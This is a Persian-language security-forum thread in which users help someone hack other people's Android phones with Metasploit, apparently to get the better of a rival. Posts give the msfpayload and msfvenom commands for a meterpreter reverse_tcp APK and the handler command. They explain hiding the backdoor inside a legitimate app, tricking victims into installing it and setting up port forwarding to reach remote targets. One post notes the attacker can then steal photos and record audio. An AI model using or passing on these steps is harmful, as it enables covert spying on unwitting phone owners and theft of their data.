رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

مشکل در هک اندروید با متاسپلویت

پست های پیشنهاد شده

سلام

این کد رو منوتو هر سایتی دیدم یا تو یوتیوب دیدم برای هک اندروید بود

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R >a.apk

و برای دریافتش 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 E

این کد تو همه بودش

اما مشکلی که من دارم اینه که با این برنامه که ساخته میشه فقط کسایی که به وایفای من وصلن رو میشه هک کرد

من هر راهی امتحان کردم نشدش کسایی که به وای فای من وصل نیستن و از من دور هستند رو هک کنم

لطفا یه کمکی کنید. سر ابرو هستش.خخخخخخخخ

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

هک گوشی های اندروید در صورتی هست که شما آی پی طرف رو داشته باشین.

آیا دارین؟

این دستور بالا هاست با آی پی مذکور رو ریورس (reverse)میکنه و به دیوایس های موجود در شبکه با پورت 4444 نفوذ میکنه.

لینک به دیدگاه

سلام

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R >a.apk

و برای دریافتش 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 E

این کد تو همه بودش

اما مشکلی که من دارم اینه که با این برنامه که ساخته میشه فقط کسایی که به وایفای من وصلن رو میشه هک کرد

من هر راهی امتحان کردم نشدش کسایی که به وای فای من وصل نیستن و از من دور هستند رو هک کنم

درود!!

دوست عزیز چه ربطی به وایفای و.. داره؟؟؟؟

با این دستورات میتونین هرکسی رو هک کنین فقط کافیه که برنامه رو قربانیتون نصب کنه

وقتی شما این برنامه رو میسازین و به قربانی میدین،قربانی با باز کردن این برنامه یه بکدور در گوشیش ساخته میشه  و بهتون دسترسی میده که میتونین باهاش به گوشی قربانی نفوذ کنین...

البته اینم بگم دیگه کمتر کسی همچین برنامه تابلویی رو تو گوشیش نصب میکنه !!!

از تاپیک زیر استفاده کنین بدردتون میخوره

http://guardiran.org/forums/topic/1773-%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%87%D8%A7%DB%8C-%DA%A9%D8%A7%D9%84%DB%8C/page-6#entry8154

موفق باشید

لینک به دیدگاه

درود

دوستان تا اونجا که من هم اطلاع دارم هک اندروید با متااسپلویت کالی دقیقا فقط برای دیوایس هایی هستند که بصورت مشترک به یه وای فا یا وای فا شما وصلند

اگه اشتباه نکنم خوده مدیر بازنشسته demon عزیز هم اموزش داده بودند و منم در یه سایتی اموزششو خونده بودم

حالا بازم شاید من اشتباه میکنم با عرض پوزش از اساتید محترم

لینک به دیدگاه

سلام

هک گوشی های اندروید در صورتی هست که شما آی پی طرف رو داشته باشین.

آیا دارین؟

این دستور بالا هاست با آی پی مذکور رو ریورس (reverse)میکنه و به دیوایس های موجود در شبکه با پورت 4444 نفوذ میکنه.

بله دارم

لینک به دیدگاه

ممنون از پاسختون

اما من برای هک نمیخوام یه رو کم کنی بچگونس درگیرش شدم.خخخخخخ

من تو قسمت ایپی مشکل دارم

نمیدونم ایپی برنامه ساخته شده رو چی بدم ایپی گیرنده رو چی بدم

تو این مورد چند روزه گیر کردم

لینک به دیدگاه

درود!!

دوستان عزیز لطفا هر سوالی راجب کالی لینوکس و بکترک دارن در لینک زیر بپرسند

http://guardiran.org/forums/topic/2139-%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%D8%B3%D9%88%D8%A7%D9%84%D8%A7%D8%AA-%DA%A9%D8%A7%D9%84%DB%8C-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3/#entry8547

لینک به دیدگاه

• 7 ماه بعد...

سلام

اموزش هک اندروید با کالی لینوکس رو سرچ کنید کامل گذاشته شده

دوست عزیز ../

لطفا تاپیک های قدیمی رو بالا نیارید !

لطفا قبل از انجام فعالیت در انجمن حتما قوانین رو مطالعه بفرمایید

یا حـ ـق ../

لینک به دیدگاه

• 1 ماه بعد...
  • 1 سال بعد...
در در 1394/08/17, 17:57:54، aliakbar1378121 گفته است :

سلام

و برای دریافتش 

این کد تو همه بودش

دوست عزیز شما کافیه به جای 192.168.0.6 ای پی سیستمتو بزنی ای پی سیستم هم کافیع تو اینترنت بزنی my ip اون ایپی رو بزن جای

192.168.0.6helpو  بجای msfpayload بزن msfvenom

ینی اینجوری

msfvenom android/meterpreter/reverse_tcp LHOST=My ip LPORT=4444 R >a.apk

لینک به دیدگاه

در در 1394/08/17, 18:44:40، iIi_Mr_Ali_bH_iIi گفته است :

درود!!

با این دستورات میتونین هرکسی رو هک کنین فقط کافیه که برنامه رو قربانیتون نصب کنه

وقتی شما این برنامه رو میسازین و به قربانی میدین،قربانی با باز کردن این برنامه یه بکدور در گوشیش ساخته میشه  و بهتون دسترسی میده که میتونین باهاش به گوشی قربانی نفوذ کنین...

http://guardiran.org/forums/topic/1773-%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%87%D8%A7%DB%8C-%DA%A9%D8%A7%D9%84%DB%8C/page-6#entry8154

موفق باشید

در رابطه با این حرفتون بگم ک میتونین راتی ک ساختین رو با هر برنامه کاربردی اندروید ک دلتون خاس ادغام کنین و ب تارگت بدین ک ن شک کنه ن دسرسی موقتی برای ای پی های غیر ثابت داشته باشید

لینک به دیدگاه

در در 1394/08/17, 18:44:40، iIi_Mr_Ali_bH_iIi گفته است :

درود!!

موفق باشید

در رابطه با این حرفتون بگم ک میتونین راتی ک ساختین رو با هر برنامه کاربردی اندروید ک دلتون خاس ادغام کنین و ب تارگت بدین ک ن شک کنه ن دسرسی موقتی برای ای پی های غیر ثابت داشته باشید

لینک به دیدگاه

در در 1394/08/18, 13:45:15، tieun گفته است :

درود

دوستان تا اونجا که من هم اطلاع دارم هک اندروید با متااسپلویت کالی دقیقا فقط برای دیوایس هایی هستند که بصورت مشترک به یه وای فا یا وای فا شما وصلند

اگه اشتباه نکنم خوده مدیر بازنشسته demon عزیز هم اموزش داده بودند و منم در یه سایتی اموزششو خونده بودم

حالا بازم شاید من اشتباه میکنم با عرض پوزش از اساتید محترم

نخیر دوست عزیز کسایی ک به وای فای شما هم وصل نباشن رو میتونین بهش نفوذ کنین حتی اونایی ک بستهای همراه هم دارن

لینک به دیدگاه

• 3 هفته بعد...

سلام

و برای دریافتش 

این کد تو همه بودش

سلام. امیدوارم معنای امنیت رو در حقیقت خود کلمه حس کنید.

برای اینکه بتونید چنین کاری بکنید هم از payload پیوست استفاده کنید.

بعد اینم در نظر بگیرید که هک هر قربانی تا حدودی نیاز به مهندس اجتماعی هم داره. شما رفتار کاربر رو بسنجید و ببینید اهل چه نرم افزارهایی هستش. ببین از چه نرم افزاری خوشش میاد؟ شاید از آشپزی خوشش اومد شایدم از کیف پول و یا شاید نرم افزار محاسبه متراژ متر مربع. (سعی کن یه برنامه پولی که مطمئنی رو گوشیش نصب نکرده رو پیدا کنی)

از اونجا که از اسم فایل معلوم هست (apk-embed-payload) یعنی اینکه برنامه میاد payload رو با خودش حمل میکنه ، signature نرم افزار تغییر میکنه. کاربر به راحتی نمیتونه signature نرم افزار رو شناسایی کنه مگر اینکه نسخه جدید برنامه رو بگیره و توی نصب دچار مشکل بشه.

حالا بعد از اینکه payload رو به نرم افزار تزریق کردی (که مطمئنا فیلم آموزشیش گیرت میاد) فایل رو آماده ارسال بکن و بگو که خیلی برنامه خوبیه و اینا.

از این به بعد موقعیت قربانی مهمه. اگر با هم توی یه شبکه هستین (مثل وای فای خونه و یا یه جایی که به یه مودم وصل بشید خیلی خوبه)  ولی اگر از راه دور باشه با محدودیت مواجه هستی. فرض میکنیم توی یه شبکه هستین. در زمان تعریف LHOST آی پی خودت رو بده. فایل رو بساز. متااسپلویت رو بیار بالا. exploit رو اجرا کن، مشخصات ای پی و پورت خودت رو بهش بده و استارت کن تا اکسپلویت بره روی حالت Listen و منتظر اتصال باشه...

به اینجا که رسیدی برنامه رو برای قربانی به هر شکلی شده بفرست و سعی کن نصبش بکنه. یا گولش بزن یا خودت نصب کن. وقتی که نصب کرد خود payload به ای پی تعریف شده وصل میشه و تو دیگه گوشی تو دستته. دیگه میتونی عکساشو یکی یکی دانلود کنی و یا اینکه به میکروفونش بگی فلان ثانیه صدا ضبط کنه یا ...

حالا فرض میکنیم طرف توی نت شما نیست. اینجا تو باید اون دستگاه رو از طریق Ip valid وصل کنی به سیستم خودت. خب چجوری؟ این نیاز به port forward داره. اگر پورت توی payload رو مثلا 4444 معرفی کردی، به مودم هم باید بگی که در صورت ورود هرگونه درخواست برای پورت 4444، بفرستش پیش من. ضمنا برای وارد کردن ای پی باید از جایی که نت میگیری باید بهشون بگی برات آی پی ولید وصل کنن تا مستقیم وصل شه به مودمت. فکر کنم هر سه ماه 6000 تومن باشه. اینطوریه که موبایل با ای پی xxx.xxx.xxx.xxx میتونه به آی پی شما به آدرس xxx.xxx.xxx.xxx اطلاعات بفرسته و مستقیم برسه به مودمت و از اونجا مستقیم بیاد برای سیستم.

موفق باشی.

This is the hidden content, please

لینک به دیدگاه

• 1 ماه بعد...

سلام

و برای دریافتش 

این کد تو همه بودش

سلام

دوست عزیز دوستان درست میگن

من هم قبلا خیلی سر این موضوع وقت گذاشتم ، ولی همینطور که گفتن این روش فقط  برای افراد متصل به مودم هست

لینک به دیدگاه

در 4 ساعت قبل، Worst_board گفته است :

سلام

دوست عزیز دوستان درست میگن

من هم قبلا خیلی سر این موضوع وقت گذاشتم ، ولی همینطور که گفتن این روش فقط  برای افراد متصل به مودم هست

سلام

دوست عزیز اگر مطالب قبلی رو خونده باشید و کمی هم توجه کرده باشید میبینید که توی آدرس دهی شما یه آدرس رو به کد میدید و میگید وقتی که روی این گوشی نصب شدی، یه سری اطلاعات رو به اتاق بغلی بفرست.

کد میره روی دستگاه قربانی نصب میشه اما آدرسی که بهش دادید رو توی شبکه وای فای پیدا میکنه اما کسی که بیرون هست رو پیدا نمیکنه چرا؟ چونکه شما ادرس اتاق بغلی رو بهش دادید اما کد بیرون از شهر هست. برای اینکه بتونه شما رو پیدا کنه باید آدرس کدپستی ساختمون رو بهش بدید ، به نگهبانی ساختمون بگید که هر وقت فلان بسته اومد بیارش واحد ما.

این تفاسیر توی شبکه چجوری هست؟ به این شرح:

1- شما یه آی پی پابلیک دارید که باید به کد معرفی کنید تا وقتی میفرستید برای یکی دیگه بتونه به آی پی شما در سرتاسر اینترنت دسترسی پیدا بکنه

2-بعد به مودم خودتون که دارای آی پی پابلیک هست از طریق port forwarding بگید که هر وقت از طریق پورت 4444 بسته ای رو دریافت کردی پس نده، بفرستش به آی پی داخلی به شماره مثلا 192.168.0.2

3- اینجوریه که هروقت طرف کد روی گوشیش نصب بشه بصورت منطقی توی شبکه میتونه شما رو پیدا کنه و فرمان بگیره.

موفق و موید

لینک به دیدگاه

با سلام من جواب تمام دوستان رو خوندم و جواب رو پیدا نکردم گفتم یه توضیح بدم

خوب اول باید بگم بله این پیلود ها برای روتور شما جواب میده

خوب راه حل چیست ؟ چند عکس میزارم امید وارم متوجه شید به زودی قول میدم آموزش هک تمام اندروید های متصل به نت رو بزارم

لینک به دیدگاه

• 2 هفته بعد...

موقع ساخت پیلود باید ای پی ولید رو بدید همون ای پی پابلیک ولی موقعی که اکسپلویت راه افتاده ای پی لوکال یا محلی رو باید بدید ضمنا باید حتما یه پورتی برای این کانال ارتباطی داخل مودم تعریف کنید تا پکت ها بتونن رد و بدل بشن 

حالا واقعا سود اینکارا چیه ؟ بهتره بجاش مردمو اگاه کنیم که هر برنامه ای نصب نکنن هر چیزیو باور نکنن .

لینک به دیدگاه

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• ایجاد مورد جدید...